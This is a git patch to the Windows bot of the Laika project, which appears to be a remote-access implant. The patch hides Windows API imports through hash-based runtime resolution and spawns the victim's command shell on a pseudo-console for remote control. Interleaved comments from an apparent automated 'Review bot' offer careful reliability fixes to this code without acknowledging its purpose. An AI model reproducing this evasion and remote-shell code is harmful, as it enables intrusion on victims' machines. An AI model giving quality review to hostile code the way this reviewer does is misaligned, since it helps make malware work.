From fdbe6cf3c78148490ec33302641ee2501b324f51 Mon Sep 17 00:00:00 2001
From: CPunch
Date: Fri, 8 Jul 2022 16:12:27 -0500
Subject: [PATCH] Bot: More APIs added to laikaO_init()
- Misc. functions converted to their UTF-8 version
- ClosePseudoConsole & CreateProcessA are now manually 'linked' during runtime
---
 bot/include/obf.h | 4 ++++
 bot/win/winobf.c | 13 +++++--------
 bot/win/winshell.c | 12 ++++++------
 3 files changed, 15 insertions(+), 14 deletions(-)
diff --git a/bot/include/obf.h b/bot/include/obf.h
index dd7d579..6b8769a 100644
--- a/bot/include/obf.h
+++ b/bot/include/obf.h
@@ -10,9 +10,13 @@
 /* WINAPI types */
 typedef HINSTANCE(WINAPI *_ShellExecuteA)(HWND, LPCSTR, LPCSTR, LPCSTR, LPCSTR, INT);
 typedef HRESULT(WINAPI *_CreatePseudoConsole)(COORD, HANDLE, HANDLE, HPCON *);
+typedef void(WINAPI *_ClosePseudoConsole)(HPCON);
+typedef BOOL(WINAPI *_CreateProcessA)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION);
 extern _ShellExecuteA oShellExecuteA;
 extern _CreatePseudoConsole oCreatePseudoConsole;
+extern _ClosePseudoConsole oClosePseudoConsole;
+extern _CreateProcessA oCreateProcessA;
 #endif
 void laikaO_init();
diff --git a/bot/win/winobf.c b/bot/win/winobf.c
index b5363e1..3bb17e3 100644
--- a/bot/win/winobf.c
+++ b/bot/win/winobf.c
@@ -137,10 +137,10 @@ _findByHashFail:
 _ShellExecuteA oShellExecuteA;
 _CreatePseudoConsole oCreatePseudoConsole;
+_ClosePseudoConsole oClosePseudoConsole;
+_CreateProcessA oCreateProcessA;
-/* todo api:
- ClosePseudoConsole
- CreateProcessA
+/* TODO:
 GetEnvironmentVariable
 */
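Review bot: The new typedef names `_ClosePseudoConsole` and `_CreateProcessA` in bot/include/obf.h (following the existing `_ShellExecuteA` and `_CreatePseudoConsole`) start with an underscore followed by an uppercase letter, a form C reserves for the implementation in every scope, so they can collide with names from the CRT or the Windows headers; a project prefix with a `_t` suffix, e.g. `laikaO_CreateProcessA_t`, avoids that. The two new `extern` pointers are also undocumented: their definitions in the bot/win/winobf.c hunk below have no initializer, so as file-scope objects they are zero until `laikaO_init()` has run, and the header should state that, e.g. `/* resolved at runtime by laikaO_init(); NULL until then (and if the lookup fails) */`. Every caller therefore depends on `laikaO_init()` having been called first, which the declaration `void laikaO_init();` on the last context line does not say; `void laikaO_init(void);` would at least give callers a real prototype.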
@@ -151,13 +151,10 @@ void laikaO_init()
 /* TODO: these library strings should probably be obfuscated (by a skid box maybe?) */
 oShellExecuteA = (_ShellExecuteA)findByHash("shell32.dll", 0x89858cd3);
 oCreatePseudoConsole = (_CreatePseudoConsole)findByHash("kernel32.dll", 0x7310ef7);
+ oClosePseudoConsole = (_ClosePseudoConsole)findByHash("kernel32.dll", 0xeff42590);
+ oCreateProcessA = (_CreateProcessA)findByHash("kernel32.dll", 0x9e687c1d);
 /*
- hash = getHashName("CreateProcessA"); // 0x9e687c1d
- printf("CreateProcessA: real is %p, hashed is %p. [HASH: %x]\n",
- (void *)CreateProcessA,
- findByHash("kernel32.dll", hash), hash);
-
 hash = getHashName("InitializeProcThreadAttributeList");
 printf("InitializeProcThreadAttributeList: real is %p, hashed is %p. [HASH: %x]\n",
 (void *)InitializeProcThreadAttributeList,
diff --git a/bot/win/winshell.c b/bot/win/winshell.c
index 80165bb..4ae1f7f 100644
--- a/bot/win/winshell.c
+++ b/bot/win/winshell.c
@@ -24,7 +24,7 @@ HRESULT InitializeStartupInfoAttachedToPseudoConsole(STARTUPINFOEX *pStartupInfo
 struct sLaika_shell *laikaB_newRAWShell(struct sLaika_bot *bot, int cols, int rows, uint32_t id) {
- TCHAR szComspec[MAX_PATH];
+ CHAR szComspec[MAX_PATH];
 struct sLaika_RAWshell *shell = (struct sLaika_RAWshell *)laikaM_malloc(sizeof(struct sLaika_RAWshell));
 HRESULT hr;
@@ -40,7 +40,7 @@ struct sLaika_shell *laikaB_newRAWShell(struct sLaika_bot *bot, int cols, int ro
 }
 /* get user's shell path */
- if (GetEnvironmentVariable("COMSPEC", szComspec, MAX_PATH) == 0) {
+ if (GetEnvironmentVariableA("COMSPEC", szComspec, MAX_PATH) == 0) {
 laikaM_free(shell);
 return NULL;
 }
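Review bot: The two new `findByHash` results are stored in `oClosePseudoConsole` and `oCreateProcessA` without being checked, matching the unchecked lookups above them; the `_findByHashFail:` label in the previous hunk's header suggests `findByHash` has a failure path (presumably returning NULL), and bot/win/winshell.c then calls `oClosePseudoConsole(shell->pseudoCon)` and `oCreateProcessA(...)` unconditionally, so a failed lookup turns into a call through a null pointer instead of a reportable error. This is a realistic case rather than a theoretical one, because `ClosePseudoConsole` is only exported by the Windows releases that also provide `CreatePseudoConsole`. A check after the assignments such as `if (oClosePseudoConsole == NULL || oCreateProcessA == NULL) { /* runtime API resolution failed */ }`, with `laikaO_init()` returning a status or the callers testing the pointers before use, would make the failure explicit. The body of `laikaO_init()` continues past the end of this hunk.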
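Review bot: `GetEnvironmentVariableA("COMSPEC", szComspec, MAX_PATH)` is only tested against 0; when the value does not fit, the call returns the required size (greater than `MAX_PATH`) and the contents of `szComspec` are undefined, so the buffer would later be handed to the process-creation call as the command line. Capture the return value and reject both cases: `DWORD len = GetEnvironmentVariableA("COMSPEC", szComspec, sizeof szComspec);` followed by `if (len == 0 || len >= sizeof szComspec) {`. Using `sizeof szComspec` rather than repeating `MAX_PATH` also keeps the size tied to the `CHAR szComspec[MAX_PATH]` declaration changed in the preceding hunk. The rest of `laikaB_newRAWShell` lies outside this hunk.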
@@ -48,14 +48,14 @@ struct sLaika_shell *laikaB_newRAWShell(struct sLaika_bot *bot, int cols, int ro
 /* create process */
 hr = InitializeStartupInfoAttachedToPseudoConsole(&shell->startupInfo, shell->pseudoCon);
 if (hr != S_OK) {
- ClosePseudoConsole(shell->pseudoCon);
+ oClosePseudoConsole(shell->pseudoCon);
 laikaM_free(shell);
 return NULL;
 }
 /* launch cmd shell */
- hr = CreateProcess(NULL, /* No module name - use Command Line */
+ hr = oCreateProcessA(NULL, /* No module name - use Command Line */
 szComspec, /* Command Line */
 NULL, /* Process handle not inheritable */
 NULL, /* Thread handle not inheritable */
@@ -72,7 +72,7 @@ struct sLaika_shell *laikaB_newRAWShell(struct sLaika_bot *bot, int cols, int ro
 DeleteProcThreadAttributeList(shell->startupInfo.lpAttributeList);
 laikaM_free(shell->startupInfo.lpAttributeList);
- ClosePseudoConsole(shell->pseudoCon);
+ oClosePseudoConsole(shell->pseudoCon);
 laikaM_free(shell);
 return NULL;
@@ -97,7 +97,7 @@ void laikaB_freeRAWShell(struct sLaika_bot *bot, struct sLaika_shell *_shell)
 laikaM_free(shell->startupInfo.lpAttributeList);
 /* close pseudo console */
- ClosePseudoConsole(shell->pseudoCon);
+ oClosePseudoConsole(shell->pseudoCon);
 /* free shell struct */
 laikaM_free(shell);
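Review bot: `hr = oCreateProcessA(NULL, ...)` stores a `BOOL` in `hr`, which the `@@ -24` hunk declares as `HRESULT`; the `_CreateProcessA` typedef returns nonzero on success and zero on failure, the opposite sense of an `HRESULT` where `S_OK` is 0, so the comparison that follows the call (outside this hunk) must be a BOOL test and not an `hr != S_OK` check like the one visible above for `InitializeStartupInfoAttachedToPseudoConsole`. A dedicated variable removes the ambiguity: `BOOL created = oCreateProcessA(NULL, ...);` and `if (!created) {` guarding the cleanup path that the `@@ -72` hunk shows. The mismatch already existed with the direct `CreateProcess` call, so the commit does not introduce it, but the line is being rewritten anyway and the call's argument list continues past the end of the hunk.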